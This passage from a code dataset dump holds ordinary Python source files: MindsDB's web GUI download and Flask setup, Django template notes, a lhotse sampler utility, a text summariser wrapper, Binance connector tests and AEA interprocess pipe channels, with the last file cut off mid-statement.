max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
mindsdb/api/http/initialize.py | mindsdb/main | 261 | 17263 | from distutils.version import LooseVersion
import requests
import os
import shutil
import threading
import webbrowser
from zipfile import ZipFile
from pathlib import Path
import traceback
import tempfile
# import concurrent.futures
from flask import Flask, url_for, make_response
from flask.json import dumps
from flask_restx import Api
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.interfaces.datastore.datastore import DataStore
from mindsdb.interfaces.model.model_interface import ModelInterface
from mindsdb.interfaces.database.integrations import IntegrationController
from mindsdb.utilities.ps import is_pid_listen_port, wait_func_is_true
from mindsdb.utilities.telemetry import inject_telemetry_to_static
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import get_log
from mindsdb.interfaces.storage.db import session
from mindsdb.utilities.json_encoder import CustomJSONEncoder
class Swagger_Api(Api):
"""
This is a modification of the base Flask Restplus Api class due to the issue described here
https://github.com/noirbizarre/flask-restplus/issues/223
"""
@property
def specs_url(self):
return url_for(self.endpoint("specs"), _external=False)
def custom_output_json(data, code, headers=None):
resp = make_response(dumps(data), code)
resp.headers.extend(headers or {})
return resp
def get_last_compatible_gui_version() -> LooseVersion:
log = get_log('http')
try:
res = requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json', timeout=5)
except (ConnectionError, requests.exceptions.ConnectionError) as e:
print(f'Is no connection. {e}')
return False
except Exception as e:
print(f'Is something wrong with getting compatible-config.json: {e}')
return False
if res.status_code != 200:
print(f'Cant get compatible-config.json: returned status code = {res.status_code}')
return False
try:
versions = res.json()
except Exception as e:
print(f'Cant decode compatible-config.json: {e}')
return False
current_mindsdb_lv = LooseVersion(mindsdb_version)
try:
gui_versions = {}
max_mindsdb_lv = None
max_gui_lv = None
for el in versions['mindsdb']:
if el['mindsdb_version'] is None:
gui_lv = LooseVersion(el['gui_version'])
else:
mindsdb_lv = LooseVersion(el['mindsdb_version'])
gui_lv = LooseVersion(el['gui_version'])
if mindsdb_lv.vstring not in gui_versions or gui_lv > gui_versions[mindsdb_lv.vstring]:
gui_versions[mindsdb_lv.vstring] = gui_lv
if max_mindsdb_lv is None or max_mindsdb_lv < mindsdb_lv:
max_mindsdb_lv = mindsdb_lv
if max_gui_lv is None or max_gui_lv < gui_lv:
max_gui_lv = gui_lv
all_mindsdb_lv = [LooseVersion(x) for x in gui_versions.keys()]
all_mindsdb_lv.sort()
if current_mindsdb_lv.vstring in gui_versions:
gui_version_lv = gui_versions[current_mindsdb_lv.vstring]
elif current_mindsdb_lv > all_mindsdb_lv[-1]:
gui_version_lv = max_gui_lv
else:
lower_versions = {key: value for key, value in gui_versions.items() if LooseVersion(key) < current_mindsdb_lv}
if len(lower_versions) == 0:
gui_version_lv = gui_versions[all_mindsdb_lv[0].vstring]
else:
all_lower_versions = [LooseVersion(x) for x in lower_versions.keys()]
gui_version_lv = gui_versions[all_lower_versions[-1].vstring]
except Exception as e:
log.error(f'Error in compatible-config.json structure: {e}')
return False
return gui_version_lv
def get_current_gui_version() -> LooseVersion:
config = Config()
static_path = Path(config['paths']['static'])
version_txt_path = static_path.joinpath('version.txt')
current_gui_version = None
if version_txt_path.is_file():
with open(version_txt_path, 'rt') as f:
current_gui_version = f.readline()
current_gui_lv = None if current_gui_version is None else LooseVersion(current_gui_version)
return current_gui_lv
def download_gui(destignation, version):
if isinstance(destignation, str):
destignation = Path(destignation)
log = get_log('http')
dist_zip_path = str(destignation.joinpath('dist.zip'))
bucket = "https://mindsdb-web-builds.s3.amazonaws.com/"
resources = [{
'url': bucket + 'dist-V' + version + '.zip',
'path': dist_zip_path
}]
def get_resources(resource):
response = requests.get(resource['url'])
if response.status_code != requests.status_codes.codes.ok:
raise Exception(f"Error {response.status_code} GET {resource['url']}")
open(resource['path'], 'wb').write(response.content)
try:
for r in resources:
get_resources(r)
except Exception as e:
log.error(f'Error during downloading files from s3: {e}')
return False
static_folder = destignation
static_folder.mkdir(mode=0o777, exist_ok=True, parents=True)
ZipFile(dist_zip_path).extractall(static_folder)
if static_folder.joinpath('dist').is_dir():
shutil.move(str(destignation.joinpath('dist').joinpath('index.html')), static_folder)
shutil.move(str(destignation.joinpath('dist').joinpath('assets')), static_folder)
shutil.rmtree(destignation.joinpath('dist'))
os.remove(dist_zip_path)
version_txt_path = destignation.joinpath('version.txt') # os.path.join(destignation, 'version.txt')
with open(version_txt_path, 'wt') as f:
f.write(version)
return True
'''
# to make downloading faster download each resource in a separate thread
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_url = {executor.submit(get_resources, r): r for r in resources}
for future in concurrent.futures.as_completed(future_to_url):
res = future.result()
if res is not None:
raise res
'''
def initialize_static():
success = update_static()
session.close()
return success
def update_static():
''' Update Scout files basing on compatible-config.json content.
Files will be downloaded and updated if new version of GUI > current.
Current GUI version stored in static/version.txt.
'''
config = Config()
log = get_log('http')
static_path = Path(config['paths']['static'])
last_gui_version_lv = get_last_compatible_gui_version()
current_gui_version_lv = get_current_gui_version()
if last_gui_version_lv is False:
return False
if current_gui_version_lv is not None:
if current_gui_version_lv >= last_gui_version_lv:
return True
log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')
temp_dir = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
success = download_gui(temp_dir, last_gui_version_lv.vstring)
if success is False:
shutil.rmtree(temp_dir)
return False
temp_dir_for_rm = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
shutil.rmtree(temp_dir_for_rm)
shutil.copytree(str(static_path), temp_dir_for_rm)
shutil.rmtree(str(static_path))
shutil.copytree(temp_dir, str(static_path))
shutil.rmtree(temp_dir_for_rm)
log.info(f'GUI version updated to {last_gui_version_lv.vstring}')
return True
def initialize_flask(config, init_static_thread, no_studio):
# Apparently there's a bug that causes the static path not to work if it's '/' -- https://github.com/pallets/flask/issues/3134, I think '' should achieve the same thing (???)
if no_studio:
app = Flask(
__name__
)
else:
static_path = os.path.join(config['paths']['static'], 'static/')
if os.path.isabs(static_path) is False:
static_path = os.path.join(os.getcwd(), static_path)
app = Flask(
__name__,
static_url_path='/static',
static_folder=static_path
)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 60
app.config['SWAGGER_HOST'] = 'http://localhost:8000/mindsdb'
app.json_encoder = CustomJSONEncoder
authorizations = {
'apikey': {
'type': 'session',
'in': 'query',
'name': 'session'
}
}
api = Swagger_Api(
app,
authorizations=authorizations,
security=['apikey'],
url_prefix=':8000',
prefix='/api',
doc='/doc/'
)
api.representations['application/json'] = custom_output_json
port = config['api']['http']['port']
host = config['api']['http']['host']
# NOTE rewrite it, that hotfix to see GUI link
if not no_studio:
log = get_log('http')
if host in ('', '0.0.0.0'):
url = f'http://127.0.0.1:{port}/'
else:
url = f'http://{host}:{port}/'
log.info(f' - GUI available at {url}')
pid = os.getpid()
x = threading.Thread(target=_open_webbrowser, args=(url, pid, port, init_static_thread, config['paths']['static']), daemon=True)
x.start()
return app, api
def initialize_interfaces(app):
app.original_data_store = DataStore()
app.original_model_interface = ModelInterface()
app.original_integration_controller = IntegrationController()
config = Config()
app.config_obj = config
def _open_webbrowser(url: str, pid: int, port: int, init_static_thread, static_folder):
"""Open webbrowser with url when http service is started.
If some error then do nothing.
"""
init_static_thread.join()
inject_telemetry_to_static(static_folder)
logger = get_log('http')
try:
is_http_active = wait_func_is_true(func=is_pid_listen_port, timeout=10,
pid=pid, port=port)
if is_http_active:
webbrowser.open(url)
except Exception as e:
logger.error(f'Failed to open {url} in webbrowser with exception {e}')
logger.error(traceback.format_exc())
session.close()
|
14Django/day04/BookManager/introduction1.py | HaoZhang95/PythonAndMachineLearning | 937 | 17267 | <gh_stars>100-1000
"""
模板语言:
{{ 变量 }}
{% 代码段 %}
{% 一个参数时:变量|过滤器, Book.id | add: 1 <= 2 当前id+1来和2比较
两个参数时:变量|过滤器:参数 %}, 过滤器最多只能传2个参数,过滤器用来对传入的变量进行修改
{% if book.name|length > 4 %} 管道|符号的左右不能有多余的空格,否则报错,其次并不是name.length而是通过管道来过滤
{{ book.pub_date|date:'Y年m月j日' }} 日期的转换管道
"""
"""
CSRF 跨站请求伪造, 盗用别人的信息,以你的名义进行恶意请求
比如:服务器返回一个表单进行转账操作,再把转账信息返回给服务器。
需要判断发送转账信息请求的客户端是不是刚才获取表单界面的客户端,防止回送请求的修改,和返回页面的修改(表单地址被修改为黑客地址,信息丢失)
防止CSRF需要服务器做安全验证
"""
"""
验证码主要用来防止暴力请求,原理就是请求页面之前生成一个动态不同的验证码写入到session中
用户登录的时候,会拿着填写的验证码和session中的验证码比较进行验证
""" |
lhotse/dataset/sampling/utils.py | stachu86/lhotse | 353 | 17269 | import warnings
from typing import Dict, Tuple
from lhotse import CutSet
from lhotse.dataset.sampling.base import CutSampler
def find_pessimistic_batches(
sampler: CutSampler, batch_tuple_index: int = 0
) -> Tuple[Dict[str, CutSet], Dict[str, float]]:
"""
Function for finding 'pessimistic' batches, i.e. batches that have the highest potential
to blow up the GPU memory during training. We will fully iterate the sampler and record
the most risky batches under several criteria:
- single longest cut
- single longest supervision
- largest batch cuts duration
- largest batch supervisions duration
- max num cuts
- max num supervisions
.. note: It is up to the users to convert the sampled CutSets into actual batches and test them
by running forward and backward passes with their model.
Example of how this function can be used with a PyTorch model
and a :class:`~lhotse.dataset.K2SpeechRecognitionDataset`::
sampler = SingleCutSampler(cuts, max_duration=300)
dataset = K2SpeechRecognitionDataset()
batches, scores = find_pessimistic_batches(sampler)
for reason, cuts in batches.items():
try:
batch = dset[cuts]
outputs = model(batch)
loss = loss_fn(outputs)
loss.backward()
except:
print(f"Exception caught when evaluating pessimistic batch for: {reason}={scores[reason]}")
raise
:param sampler: An instance of a Lhotse :class:`.CutSampler`.
:param batch_tuple_index: Applicable to samplers that return tuples of :class:`~lhotse.cut.CutSet`.
Indicates which position in the tuple we should look up for the CutSet.
:return: A tuple of dicts: the first with batches (as CutSets) and the other with criteria values, i.e.:
``({"<criterion>": <CutSet>, ...}, {"<criterion>": <value>, ...})``
"""
criteria = {
"single_longest_cut": lambda cuts: max(c.duration for c in cuts),
"single_longest_supervision": lambda cuts: max(
sum(s.duration for s in c.supervisions) for c in cuts
),
"largest_batch_cuts_duration": lambda cuts: sum(c.duration for c in cuts),
"largest_batch_supervisions_duration": lambda cuts: sum(
s.duration for c in cuts for s in c.supervisions
),
"max_num_cuts": len,
"max_num_supervisions": lambda cuts: sum(
1 for c in cuts for _ in c.supervisions
),
}
try:
sampler = iter(sampler)
first_batch = next(sampler)
if isinstance(first_batch, tuple):
first_batch = first_batch[batch_tuple_index]
except StopIteration:
warnings.warn("Empty sampler encountered in find_pessimistic_batches()")
return {}, {}
top_batches = {k: first_batch for k in criteria}
top_values = {k: fn(first_batch) for k, fn in criteria.items()}
for batch in sampler:
if isinstance(batch, tuple):
batch = batch[batch_tuple_index]
for crit, fn in criteria.items():
val = fn(batch)
if val > top_values[crit]:
top_values[crit] = val
top_batches[crit] = batch
return top_batches, top_values
|
aqg/utils/summarizer.py | Sicaida/Automatic_Question_Generation | 134 | 17284 | <gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division, print_function, unicode_literals
from sumy.parsers.html import HtmlParser
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
#from sumy.summarizers.lsa import LsaSummarizer as Summarizer
from sumy.summarizers.lex_rank import LexRankSummarizer as Summarizer
from sumy.nlp.stemmers import Stemmer
from sumy.utils import get_stop_words
class TextSummarizer:
def __init__(self, count=10):
self.LANGUAGE = "czech"
self.SENTENCES_COUNT = count
def summarize_from_url(self,url):
parser = HtmlParser.from_url(url, Tokenizer(self.LANGUAGE))
stemmer = Stemmer(self.LANGUAGE)
summarizer = Summarizer(stemmer)
file_1 = open("summarizer_output.txt","w+")
file_2 = open("summarizer_output2.txt","w+")
for sentence in summarizer(parser.document, self.SENTENCES_COUNT):
file_2.write(str(sentence))
file_1.write(str(sentence))
file_1.write("\n")
file_1.close()
file_2.close()
def summarize_from_text(self,text):
parser = PlaintextParser.from_string(text, Tokenizer(self.LANGUAGE))
stemmer = Stemmer(self.LANGUAGE)
summarizer = Summarizer(stemmer)
file_1 = open("summarizer_output.txt","w+")
file_2 = open("summarizer_output2.txt","w+")
for sentence in summarizer(parser.document, self.SENTENCES_COUNT):
file_2.write(str(sentence))
file_1.write(str(sentence))
file_1.write("\n")
file_1.close()
file_2.close()
def summarize_from_file(self,file_name):
parser = PlaintextParser.from_file(file_name, Tokenizer(self.LANGUAGE))
stemmer = Stemmer(self.LANGUAGE)
summarizer = Summarizer(stemmer)
file_1 = open("summarizer_output.txt","w+")
file_2 = open("summarizer_output2.txt","w+")
for sentence in summarizer(parser.document, self.SENTENCES_COUNT):
file_2.write(str(sentence))
file_1.write(str(sentence))
file_1.write("\n")
file_1.close()
file_2.close()
# t = TextSummarizer()
# t.summarize_from_file("obama_short.txt")
# pdf = pdfgeneration()
# pdf.generate_pdf_summarizer("summarizer_output2.txt")
|
tests/spot/sub_account/test_sub_account_deposit_address.py | Banging12/binance-connector-python | 512 | 17308 | <reponame>Banging12/binance-connector-python
import responses
from tests.util import random_str
from tests.util import mock_http_response
from binance.spot import Spot as Client
from binance.lib.utils import encoded_string
from binance.error import ParameterRequiredError
mock_item = {"key_1": "value_1", "key_2": "value_2"}
key = random_str()
secret = random_str()
params = {
"email": "<EMAIL>",
"coin": "BNB",
"network": "BNB",
"recvWindow": 1000,
}
def test_sub_account_deposit_address_without_email():
"""Tests the API endpoint to get deposit address without email"""
params = {"email": "", "coin": "BNB", "network": "BNB", "recvWindow": 1000}
client = Client(key, secret)
client.sub_account_deposit_address.when.called_with(**params).should.throw(
ParameterRequiredError
)
def test_sub_account_deposit_address_without_coin():
"""Tests the API endpoint to get deposit address without coin"""
params = {
"email": "<EMAIL>",
"coin": "",
"network": "BNB",
"recvWindow": 1000,
}
client = Client(key, secret)
client.sub_account_deposit_address.when.called_with(**params).should.throw(
ParameterRequiredError
)
@mock_http_response(
responses.GET,
"/sapi/v1/capital/deposit/subAddress\\?" + encoded_string(params),
mock_item,
200,
)
def test_sub_account_deposit_address():
"""Tests the API endpoint to get deposit address"""
client = Client(key, secret)
response = client.sub_account_deposit_address(**params)
response.should.equal(mock_item)
|
aea/helpers/pipe.py | bryanchriswhite/agents-aea | 126 | 17340 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Portable pipe implementation for Linux, MacOS, and Windows."""
import asyncio
import errno
import logging
import os
import socket
import struct
import tempfile
from abc import ABC, abstractmethod
from asyncio import AbstractEventLoop
from asyncio.streams import StreamWriter
from shutil import rmtree
from typing import IO, Optional
from aea.exceptions import enforce
_default_logger = logging.getLogger(__name__)
PIPE_CONN_TIMEOUT = 10.0
PIPE_CONN_ATTEMPTS = 10
TCP_SOCKET_PIPE_CLIENT_CONN_ATTEMPTS = 5
class IPCChannelClient(ABC):
"""Multi-platform interprocess communication channel for the client side."""
@abstractmethod
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to communication channel
:param timeout: timeout for other end to connect
:return: connection status
"""
@abstractmethod
async def write(self, data: bytes) -> None:
"""
Write `data` bytes to the other end of the channel
Will first write the size than the actual data
:param data: bytes to write
"""
@abstractmethod
async def read(self) -> Optional[bytes]:
"""
Read bytes from the other end of the channel
Will first read the size than the actual data
:return: read bytes
"""
@abstractmethod
async def close(self) -> None:
"""Close the communication channel."""
class IPCChannel(IPCChannelClient):
"""Multi-platform interprocess communication channel."""
@property
@abstractmethod
def in_path(self) -> str:
"""
Rendezvous point for incoming communication.
:return: path
"""
@property
@abstractmethod
def out_path(self) -> str:
"""
Rendezvous point for outgoing communication.
:return: path
"""
class PosixNamedPipeProtocol:
"""Posix named pipes async wrapper communication protocol."""
def __init__(
self,
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize a new posix named pipe.
:param in_path: rendezvous point for incoming data
:param out_path: rendezvous point for outgoing data
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self._loop = loop
self._in_path = in_path
self._out_path = out_path
self._in = -1
self._out = -1
self._stream_reader = None # type: Optional[asyncio.StreamReader]
self._reader_protocol = None # type: Optional[asyncio.StreamReaderProtocol]
self._fileobj = None # type: Optional[IO[str]]
self._connection_attempts = PIPE_CONN_ATTEMPTS
self._connection_timeout = PIPE_CONN_TIMEOUT
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to the other end of the pipe
:param timeout: timeout before failing
:return: connection success
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._connection_timeout = timeout / PIPE_CONN_ATTEMPTS if timeout > 0 else 0
if self._connection_attempts <= 1: # pragma: no cover
return False
self._connection_attempts -= 1
self.logger.debug(
"Attempt opening pipes {}, {}...".format(self._in_path, self._out_path)
)
self._in = os.open(self._in_path, os.O_RDONLY | os.O_NONBLOCK | os.O_SYNC)
try:
self._out = os.open(self._out_path, os.O_WRONLY | os.O_NONBLOCK)
except OSError as e: # pragma: no cover
if e.errno == errno.ENXIO:
self.logger.debug("Sleeping for {}...".format(self._connection_timeout))
await asyncio.sleep(self._connection_timeout)
return await self.connect(timeout)
raise e
# setup reader
enforce(
self._in != -1 and self._out != -1 and self._loop is not None,
"Incomplete initialization.",
)
self._stream_reader = asyncio.StreamReader(loop=self._loop)
self._reader_protocol = asyncio.StreamReaderProtocol(
self._stream_reader, loop=self._loop
)
self._fileobj = os.fdopen(self._in, "r")
await self._loop.connect_read_pipe(
lambda: self.__reader_protocol, self._fileobj
)
return True
@property
def __reader_protocol(self) -> asyncio.StreamReaderProtocol:
"""Get reader protocol."""
if self._reader_protocol is None:
raise ValueError("reader protocol not set!") # pragma: nocover
return self._reader_protocol
async def write(self, data: bytes) -> None:
"""
Write to pipe.
:param data: bytes to write to pipe
"""
self.logger.debug("writing {}...".format(len(data)))
size = struct.pack("!I", len(data))
os.write(self._out, size + data)
await asyncio.sleep(0.0)
async def read(self) -> Optional[bytes]:
"""
Read from pipe.
:return: read bytes
"""
if self._stream_reader is None: # pragma: nocover
raise ValueError("StreamReader not set, call connect first!")
try:
self.logger.debug("waiting for messages (in={})...".format(self._in_path))
buf = await self._stream_reader.readexactly(4)
if not buf: # pragma: no cover
return None
size = struct.unpack("!I", buf)[0]
if size <= 0: # pragma: no cover
return None
data = await self._stream_reader.readexactly(size)
if not data: # pragma: no cover
return None
return data
except asyncio.IncompleteReadError as e: # pragma: no cover
self.logger.info(
"Connection disconnected while reading from pipe ({}/{})".format(
len(e.partial), e.expected
)
)
return None
except asyncio.CancelledError: # pragma: no cover
return None
async def close(self) -> None:
"""Disconnect pipe."""
self.logger.debug("closing pipe (in={})...".format(self._in_path))
if self._fileobj is None:
raise ValueError("Pipe not connected") # pragma: nocover
try:
# hack for MacOSX
size = struct.pack("!I", 0)
os.write(self._out, size)
os.close(self._out)
self._fileobj.close()
except OSError: # pragma: no cover
pass
await asyncio.sleep(0)
class TCPSocketProtocol:
"""TCP socket communication protocol."""
def __init__(
self,
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize the tcp socket protocol.
:param reader: established asyncio reader
:param writer: established asyncio writer
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self.loop = loop if loop is not None else asyncio.get_event_loop()
self._reader = reader
self._writer = writer
@property
def writer(self) -> StreamWriter:
"""Get a writer associated with protocol."""
return self._writer
async def write(self, data: bytes) -> None:
"""
Write to socket.
:param data: bytes to write
"""
if self._writer is None:
raise ValueError("writer not set!") # pragma: nocover
self.logger.debug("writing {}...".format(len(data)))
size = struct.pack("!I", len(data))
self._writer.write(size + data)
await self._writer.drain()
async def read(self) -> Optional[bytes]:
"""
Read from socket.
:return: read bytes
"""
try:
self.logger.debug("waiting for messages...")
buf = await self._reader.readexactly(4)
if not buf: # pragma: no cover
return None
size = struct.unpack("!I", buf)[0]
data = await self._reader.readexactly(size)
if not data: # pragma: no cover
return None
if len(data) != size: # pragma: no cover
raise ValueError(
f"Incomplete Read Error! Expected size={size}, got: {len(data)}"
)
return data
except asyncio.IncompleteReadError as e: # pragma: no cover
self.logger.info(
"Connection disconnected while reading from pipe ({}/{})".format(
len(e.partial), e.expected
)
)
return None
except asyncio.CancelledError: # pragma: no cover
return None
async def close(self) -> None:
"""Disconnect socket."""
if self._writer.can_write_eof():
self._writer.write_eof()
await self._writer.drain()
self._writer.close()
wait_closed = getattr(self._writer, "wait_closed", None)
if wait_closed:
# in py3.6 writer does not have the coroutine
await wait_closed() # pragma: nocover
class TCPSocketChannel(IPCChannel):
"""Interprocess communication channel implementation using tcp sockets."""
def __init__(
self,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""Initialize tcp socket interprocess communication channel."""
self.logger = logger
self._loop = loop
self._server = None # type: Optional[asyncio.AbstractServer]
self._connected = None # type: Optional[asyncio.Event]
self._sock = None # type: Optional[TCPSocketProtocol]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("127.0.0.1", 0))
s.listen(1)
self._port = s.getsockname()[1]
s.close()
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Setup communication channel and wait for other end to connect.
:param timeout: timeout for the connection to be established
:return: connection status
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._connected = asyncio.Event()
self._server = await asyncio.start_server(
self._handle_connection, host="127.0.0.1", port=self._port
)
if self._server.sockets is None:
raise ValueError("Server sockets is None!") # pragma: nocover
self._port = self._server.sockets[0].getsockname()[1]
self.logger.debug("socket pipe rdv point: {}".format(self._port))
try:
await asyncio.wait_for(self._connected.wait(), timeout)
except asyncio.TimeoutError: # pragma: no cover
return False
self._server.close()
await self._server.wait_closed()
return True
async def _handle_connection(
self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter
) -> None:
"""Handle connection."""
if self._connected is None:
raise ValueError("Connected is None!") # pragma: nocover
self._connected.set()
self._sock = TCPSocketProtocol(
reader, writer, logger=self.logger, loop=self._loop
)
async def write(self, data: bytes) -> None:
"""
Write to channel.
:param data: bytes to write
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.write(data)
async def read(self) -> Optional[bytes]:
"""
Read from channel.
:return: read bytes
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
return await self._sock.read()
async def close(self) -> None:
"""Disconnect from channel and clean it up."""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.close()
@property
def in_path(self) -> str:
"""Rendezvous point for incoming communication."""
return str(self._port)
@property
def out_path(self) -> str:
"""Rendezvous point for outgoing communication."""
return str(self._port)
class PosixNamedPipeChannel(IPCChannel):
"""Interprocess communication channel implementation using Posix named pipes."""
def __init__(
self,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""Initialize posix named pipe interprocess communication channel."""
self.logger = logger
self._loop = loop
self._pipe_dir = tempfile.mkdtemp()
self._in_path = "{}/process_to_aea".format(self._pipe_dir)
self._out_path = "{}/aea_to_process".format(self._pipe_dir)
# setup fifos
self.logger.debug(
"Creating pipes ({}, {})...".format(self._in_path, self._out_path)
)
if os.path.exists(self._in_path):
os.remove(self._in_path) # pragma: no cover
if os.path.exists(self._out_path):
os.remove(self._out_path) # pragma: no cover
os.mkfifo(self._in_path)
os.mkfifo(self._out_path)
self._pipe = PosixNamedPipeProtocol(
self._in_path, self._out_path, logger=logger, loop=loop
)
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Setup communication channel and wait for other end to connect.
:param timeout: timeout for connection to be established
:return: bool, indicating success
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
return await self._pipe.connect(timeout)
async def write(self, data: bytes) -> None:
"""
Write to the channel.
:param data: data to write to channel
"""
await self._pipe.write(data)
async def read(self) -> Optional[bytes]:
"""
Read from the channel.
:return: read bytes
"""
return await self._pipe.read()
async def close(self) -> None:
"""Close the channel and clean it up."""
await self._pipe.close()
rmtree(self._pipe_dir)
@property
def in_path(self) -> str:
"""Rendezvous point for incoming communication."""
return self._in_path
@property
def out_path(self) -> str:
"""Rendezvous point for outgoing communication."""
return self._out_path
class TCPSocketChannelClient(IPCChannelClient):
"""Interprocess communication channel client using tcp sockets."""
def __init__( # pylint: disable=unused-argument
self,
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize a tcp socket communication channel client.
:param in_path: rendezvous point for incoming data
:param out_path: rendezvous point for outgoing data
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self._loop = loop
parts = in_path.split(":")
if len(parts) == 1:
self._port = int(in_path)
self._host = "127.0.0.1"
else: # pragma: nocover
self._port = int(parts[1])
self._host = parts[0]
self._sock = None # type: Optional[TCPSocketProtocol]
self._attempts = TCP_SOCKET_PIPE_CLIENT_CONN_ATTEMPTS
self._timeout = PIPE_CONN_TIMEOUT / self._attempts
self.last_exception: Optional[Exception] = None
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to the other end of the communication channel.
:param timeout: timeout for connection to be established
:return: connection status
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._timeout = timeout / TCP_SOCKET_PIPE_CLIENT_CONN_ATTEMPTS
self.logger.debug(
"Attempting to connect to {}:{}.....".format("127.0.0.1", self._port)
)
connected = False
while self._attempts > 0:
self._attempts -= 1
try:
self._sock = await self._open_connection()
connected = True
break
except ConnectionRefusedError:
await asyncio.sleep(self._timeout)
except Exception as e: # pylint: disable=broad-except # pragma: nocover
self.last_exception = e
return False
return connected
async def _open_connection(self) -> TCPSocketProtocol:
reader, writer = await asyncio.open_connection(
self._host, self._port, loop=self._loop, # pylint: disable=protected-access
)
return TCPSocketProtocol(reader, writer, logger=self.logger, loop=self._loop)
async def write(self, data: bytes) -> None:
"""
Write data to channel.
:param data: bytes to write
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.write(data)
async def read(self) -> Optional[bytes]:
"""
Read data from channel.
:return: read bytes
"""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
return await self._sock.read()
async def close(self) -> None:
"""Disconnect from communication channel."""
if self._sock is None:
raise ValueError("Socket pipe not connected.") # pragma: nocover
await self._sock.close()
class PosixNamedPipeChannelClient(IPCChannelClient):
"""Interprocess communication channel client using Posix named pipes."""
def __init__(
self,
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> None:
"""
Initialize a posix named pipe communication channel client.
:param in_path: rendezvous point for incoming data
:param out_path: rendezvous point for outgoing data
:param logger: the logger
:param loop: the event loop
"""
self.logger = logger
self._loop = loop
self._in_path = in_path
self._out_path = out_path
self._pipe = None # type: Optional[PosixNamedPipeProtocol]
self.last_exception: Optional[Exception] = None
async def connect(self, timeout: float = PIPE_CONN_TIMEOUT) -> bool:
"""
Connect to the other end of the communication channel.
:param timeout: timeout for connection to be established
:return: connection status
"""
if self._loop is None:
self._loop = asyncio.get_event_loop()
self._pipe = PosixNamedPipeProtocol(
self._in_path, self._out_path, logger=self.logger, loop=self._loop
)
try:
return await self._pipe.connect()
except Exception as e: # pragma: nocover # pylint: disable=broad-except
self.last_exception = e
return False
async def write(self, data: bytes) -> None:
"""
Write data to channel.
:param data: bytes to write
"""
if self._pipe is None:
raise ValueError("Pipe not connected.") # pragma: nocover
await self._pipe.write(data)
async def read(self) -> Optional[bytes]:
"""
Read data from channel.
:return: read bytes
"""
if self._pipe is None:
raise ValueError("Pipe not connected.") # pragma: nocover
return await self._pipe.read()
async def close(self) -> None:
"""Disconnect from communication channel."""
if self._pipe is None:
raise ValueError("Pipe not connected.") # pragma: nocover
return await self._pipe.close()
def make_ipc_channel(
logger: logging.Logger = _default_logger, loop: Optional[AbstractEventLoop] = None
) -> IPCChannel:
"""
Build a portable bidirectional InterProcess Communication channel
:param logger: the logger
:param loop: the loop
:return: IPCChannel
"""
if os.name == "posix":
return PosixNamedPipeChannel(logger=logger, loop=loop)
if os.name == "nt": # pragma: nocover
return TCPSocketChannel(logger=logger, loop=loop)
raise NotImplementedError( # pragma: nocover
"make ipc channel is not supported on platform {}".format(os.name)
)
def make_ipc_channel_client(
in_path: str,
out_path: str,
logger: logging.Logger = _default_logger,
loop: Optional[AbstractEventLoop] = None,
) -> IPCChannelClient:
"""
Build a portable bidirectional InterProcess Communication client channel
:param in_path: rendezvous point for incoming communication
:param out_path: rendezvous point for outgoing outgoing
:param logger: the logger
:param loop: the loop
:return: IPCChannel
"""
if os.name == "posix":
return PosixNamedPipeChannelClient(in_path, out_path, logger=logger, loop=loop)
if os.name == "nt": # pragma: nocover
return TCPSocketChannelClient(in_path, out_path, logger=logger, loop=loop)
raise NotImplementedError( # pragma: nocover
